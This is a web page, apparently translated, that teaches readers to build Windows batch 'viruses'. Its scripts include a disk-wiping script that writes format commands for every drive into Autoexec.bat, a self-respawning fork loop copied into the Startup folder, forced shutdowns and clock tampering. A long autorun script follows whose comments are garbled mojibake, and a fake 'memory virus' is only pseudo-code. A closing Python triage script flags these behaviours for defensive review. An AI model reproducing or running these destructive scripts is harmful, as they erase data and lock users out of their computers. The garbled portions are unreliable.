How do we create viruses?

Here I will teach you how to create viruses of various types and for various purposes. Let's begin.

The first virus I will explain appears to switch off the monitor: the light at the bottom of the monitor stays on, and no matter how many times you press the monitor's button, you still see nothing, neither the Desktop nor anything else. To make this virus I needed to create two windows, both black, so that when you open the file a window covers the monitor and nothing is visible on it. When we press the Windows and D keys one after the other, you know that this minimizes every window in order to show the Desktop; after they are pressed the first black window does close, but a second black window opens that does not allow the Desktop to be shown. Along with this I hid the so-called Taskbar, because the program needed it in order to work completely. To hide it I needed to find out the Taskbar's window class, which is: Shell_TrayWnd. Besides that, I needed to hide the cursor, because this gives the virus more effect. Downside: you can stop the virus with Task Manager.

The next virus is the Skype virus. Its purpose is to change the title of the Skype window and to make the Skype window change position. To create this virus we need to find out Skype's window class, and that class is: TApplication. In general, when we want to interact with some program, we have to find out that program's window class. As for changing the window's position, I introduced a loop and a time element: I took 3 seconds, and within those 3 seconds the window has to change position. Downside: you can stop the virus from the process list in Task Manager.

Our next virus changes the position of the cursor. To create this virus I needed to find out the cursor's coordinates; besides that I used a time element, that is, at such-and-such a time the cursor's position changes, and then I put all of this in a loop. Once this virus is started, the cursor changes position so quickly that you cannot do anything.

Here are the virus sources: download

The viruses written here must be created in a text document and then saved (Save As) as a .bat file.

This virus creates many folders:

cls
md c:\aa
cls
md c:\aa2
cls
md c:\aa3
cls
md c:\aa4
cls
md c:\aa5
cls
md c:\aa6
cls
md c:\aa8
cls
md c:\aa9
cls
md c:\aa10
cls
md c:\aa11
cls
md c:\aa12
cls
md c:\aa13
cls
md c:\aa14
cls
md c:\aa15
cls
md c:\aa16
cls
md c:\aa17
cls

This virus scrambles the clock:

@ECHO OFF
cls
time 04:04
cls
cls
date 12/12/2220
cls

Here are the DOS commands needed to create a virus:

taskkill /f /im explorer.exe (kills the process)
shutdown -r -t 60 (restarts in 60 seconds)
shutdown -l LOG OF (logs off)
format /y /q d: (formats, that is, erases D:\)
copy c:\visualhack\1.txt d:\visualhack\ (copying with cmd)
md c:\aa (creates the folder aa)

This virus will format all your disks and restart the computer:

echo format /y /q d: >> c:\Autoexec.bat
echo format /y /q e: >> c:\Autoexec.bat
echo format /y /q f: >> c:\Autoexec.bat
echo format /y /q c: >> c:\Autoexec.bat
restart -r -c

Virus named: cd rom

cls
Echo Set oWMP = CreateObject("WMPlayer.OCX.7") >m.vbs
Echo Set colCDROMs = oWMP.cdromCollection >>m.vbs
Echo colCDROMs.Item(i).Eject >>m.vbs
Start M.vbs
cls

Virus named: kill

:metka
@start kill.bat
@echo -----www.lashatt.ucoz.com-----
@goto metka

Virus named: kill1

:metka
@start kill2.bat
@echo -----www.lashatt.ucoz.com-----
@goto metka
cls
copy kill2.bat C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs\Startup
cls

This virus shuts down the computer in 60 seconds and displays a text:

shutdown -s -t 60 -c "lashatt.ucoz.com"

Virus named: Autorun deleter

@echo off
cls
echo.
echo *********** Delete Autorun batch file ***********
echo.
echo.
echo ¦¹ÀÉ®×°£¤F¦³§R°£Autorun.inf¨ÃÃö³¬Autorun¥\¯à¥~
echo ¥t¥~¦³§R°£MountPoints2¤º²§±`¾÷½Xªº¥\¯à
echo.
echo ==============================================
echo.
echo.
echo ¦¹§å¦¸ÀÉ°õ¦æ«á·|Ãö³¬Autorun¥\¯à
echo.
echo ¦pªGn¦^´_Autorun¥\¯à«h½Ð±NÀɮשñ¸m¦bc:\«á
echo.
echo «ö¶}©l -^> °õ¦æ -^> ¿é¤Jc:\delautorun open«á«ö½T©w
echo.
echo ¨Ì·Ó°Ê§@«ü¥Ü¶]§¹«á§Y¥i¦^´_Autorun¥\¯à
echo.
echo.
echo ¦p¤£·Q°õ¦æ½Ð«öCTRL+C«á«öY¸õ¥X©Îª½±µ±Nµøµ¡Ãö³¬¡C
echo.
pause
cls
if not "%1"=="open" goto st
echo.
echo ¦^´_Autorun¥\¯à¨Ã§R°£Autorun.inf¸ê®Æ§¨
for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
attrib -r -s -h +a /D /S %%a:\autorun.inf >nul 2>nul
rd %%a:\autorun.inf >nul 2>nul&&echo.&&echo ²¾°£%%a:\Autorun.inf¸ê®Æ§¨
)
echo.
echo.
reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDriveAutoRun" /f >nul 2>nul
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x00000091 /f >nul 2>nul
reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x00000091 /f >nul 2>nul
reg.exe add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x00000091 /f >nul 2>nul
echo ³B²z§¹²¦½Ð«·s¶}¾÷
echo.
pause
exit
:st
if not exist c:\delauto goto delauto
if exist c:\delauto\usbmons.dll attrib -r -s -h -a %windir%\system32\usbmons.dll&del %windir%\system32\usbmons.dll >nul 2>nul&del c:\delauto\usbmons.dll >nul 2>nul
echo.
echo ²M²z«e¦¸°õ¦æ¦¹§å¦¸ÀɼȦsÀÉ©Mautorun.inf¸ê®Æ§¨
echo.
for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
attrib -r -s -h +a /D /S %%a:\autorun.inf >nul 2>nul
rd %%a:\autorun.inf >nul 2>nul
)
del c:\delauto\*.* /s /q >nul 2>nul
rd c:\delauto /s /q
:delauto
md c:\delauto
copy %windir%\regedit.exe c:\delauto\fixreg.exe >nul 2>nul
if not exist %windir%\system32\usbmons.dll goto disable
@echo Windows Registry Editor Version 5.00 >c:\delauto\fix.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\USB Monitor] >>c:\delauto\fix.reg
@echo "Driver"="usbmon.dll" >>c:\delauto\fix.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\USB Monitor] >>c:\delauto\fix.reg
@echo "Driver"="usbmon.dll" >>c:\delauto\fix.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Print\Monitors\USB Monitor] >>c:\delauto\fix.reg
@echo "Driver"="usbmon.dll" >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\usbmon >>c:\delauto\fix.reg
c:\delauto\fixreg.exe /s c:\delauto\fix.reg
attrib -r -s -h -a %windir%\system32\usbmons.dll >nul 2>nul
copy %windir%\system32\usbmons.dll c:\delauto\ >nul 2>nul
echo ½Ð©ó«·s¶}¾÷«á¦A°õ¦æ¤@¦¸¦¹µ{¦¡
echo.
pause
cls
:disable
echo.
echo ×´_ºÏºÐÂI¤£¶}©MÃö³¬autorun¥\¯à
reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveAutoRun /t REG_BINARY /d ffffff03 /f >nul 2>nul
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x000000Ff /f >nul 2>nul
reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x000000Ff /f >nul 2>nul
reg.exe add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x000000Ff /f >nul 2>nul
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2" /f >nul 2>nul
for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
if exist %%a:\autorun.inf echo.&echo §R°£%%a:\Autorun.inf
attrib -r -s -h -a %%a:\autorun.inf >nul 2>nul&del %%a:\autorun.inf /f /q >nul 2>nul
md %%a:\autorun.inf >nul 2>nul&&echo.&&echo ³Ð«Ø%%a:\Autorun.inf¸ê®Æ§¨&&attrib +r +s +h +a %%a:\autorun.inf >nul 2>nul&&echo. >>c:\delauto\autorun.txt&&fsutil fsinfo drivetype %%a: >>c:\delauto\autorun.txt&&dir/a %%a:\|find /i "autorun.inf" >> c:\delauto\autorun.txt
)
echo.
echo §R°£¸ê·½¦^¦¬±í¤º°õ¦æÀÉ
for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
for %%b in (EXE COM PIF) do (
attrib -r -s -h -a %%a:\RECYCLER\*.%%b /s >nul 2>nul&attrib -r -s -h -a %%a:\RECYCLED\*.%%b /s >nul 2>nul
del %%a:\recycler\*.%%b /s /q /f >nul 2>nul&del %%a:\recycled\*.%%b /s /q /f >nul 2>nul
))
@echo Windows Registry Editor Version 5.00 >c:\delauto\fix.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] >>c:\delauto\fix.reg
@echo "CheckedValue"=dword:00000001 >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EGHOST.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegEx.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.com] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NOD32.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQDoctor.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.com] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREng.EXE] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe] >>c:\delauto\fix.reg
c:\delauto\fixreg.exe /s c:\delauto\fix.reg
:last
copy %windir%\regedit.exe c:\delauto\fixreg.exe >nul 2>nul
c:\delauto\fixreg.exe /s c:\delauto\fix.reg
attrib -r -s -h -a c:\found.??? /S /D >nul 2>nul
del c:\found.???\*.* /s /q /f >nul 2>nul
rd c:\found.??? >nul 2>nul
echo.
echo ³B²z§¹²¦&pause
cls
echo.
echo ¥H¤U·|Åã¥Ü¦UºÏºÐ¤ºAutorun.inf¬O§_¬°¸ê®Æ§¨
echo ¦pªG¬O¦¹§å¦¸Àɫإߤ§¸ê®Æ§¨«h·|Åã¥ÜÃþ¦ü¹³¤U¦C¤å¦r
echo.
echo C: - ©T©w¦¡ºÏºÐ
echo %date% %time% ^<DIR^> autorun.inf
echo.
echo ¦pªG¨S¦³Åã¥Ü^<DIR^>³oÓ´XÓ¤å¦r«hªí¥ÜAutorun.inf§R°£¥¢±Ñ½ÐÀˬd¹q¸£¤º¨ä¥L¦a¤è¬O§_§t¦³¯f¬r
echo ¥t¥~¦pªG¬O¥úºÐ¾÷¤ºªºÀɮ׫h½Ð©¿²¤....
echo.
pause
echo.
type c:\delauto\autorun.txt|more
echo.
echo °õ¦æ§¹²¦½Ð«·s¶}¾÷¡C
echo.
pause
exit

A virus that spawns many DOS windows (antivirus: taskkill /f /im cmd.exe):

start filename.bat

This is a memory virus:

@ECHO OFF
REM <<< code: jmp installation, int_21 handler part 1 >>>
copy %0 b.com>nul
b.com
del b.com
rem <<< code: TSR installation, int_21 handler part 2 >>>
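
As an added example (not code from the original page), here is a small Python triage script that someone reviewing unknown .bat files could use to flag the behaviours the snippets above rely on: a script that restarts itself in a goto loop, a copy into the Startup folder, format commands written to Autoexec.bat, forced shutdown, killing explorer.exe and clock changes. The rule names, the patterns and the sample scripts are assumptions constructed for this example.

```python
import re

# Behaviours the batch snippets on this page rely on. The rule names and
# patterns are assumptions of this example, not a complete signature set.
RULES = [
    ("kills-shell", re.compile(r"taskkill\b.*\bexplorer\.exe", re.I)),
    ("formats-drive", re.compile(r"\bformat\b.*\s[a-z]:", re.I)),
    ("forced-shutdown", re.compile(r"\bshutdown\s+[-/][srl]\b", re.I)),
    ("startup-persistence",
     re.compile(r"\bcopy\b.*(STARTM~1|Start Menu).*Startup", re.I)),
    ("autoexec-write", re.compile(r">>?\s*c:\\autoexec\.bat", re.I)),
    ("clock-tamper", re.compile(r"^@?(time|date)\s+\d", re.I)),
]

def triage(name, text):
    """Return the sorted behaviour labels found in one batch script."""
    hits, labels, gotos, starts_self = set(), set(), set(), False
    for line in (raw.strip() for raw in text.splitlines()):
        hits.update(label for label, rx in RULES if rx.search(line))
        if m := re.match(r":(\w+)", line):
            labels.add(m.group(1).lower())
        if m := re.match(r"@?goto\s+:?(\w+)", line, re.I):
            gotos.add(m.group(1).lower())
        if m := re.match(r"@?start\s+(\S+)", line, re.I):
            starts_self |= m.group(1).lower() == name.lower()
    # A script that starts itself inside a label/goto loop respawns forever.
    if starts_self and labels & gotos:
        hits.add("self-respawn-loop")
    return sorted(hits)

# Constructed sample inputs (inert strings, only scanned, never executed).
SAMPLE_LOOP = ":again\n@start loop.bat\n@echo hello\n@goto again"
SAMPLE_WIPE = "echo format /y /q d: >> c:\\Autoexec.bat"
SAMPLE_PERSIST = ("date 12/12/2220\n"
                  "copy loop.bat C:\\DOCUME~1\\ALLUSE~1\\STARTM~1\\Programs\\Startup\n"
                  'shutdown -s -t 60 -c "bye"')
SAMPLE_BENIGN = "@echo off\nmd c:\\backup\ncopy notes.txt c:\\backup"

if __name__ == "__main__":
    for name, text in [("loop.bat", SAMPLE_LOOP), ("wipe.bat", SAMPLE_WIPE),
                       ("persist.bat", SAMPLE_PERSIST), ("ok.bat", SAMPLE_BENIGN)]:
        print(name, triage(name, text))
```

The script only reads text, so it can be run on a quarantined copy of a file without executing it.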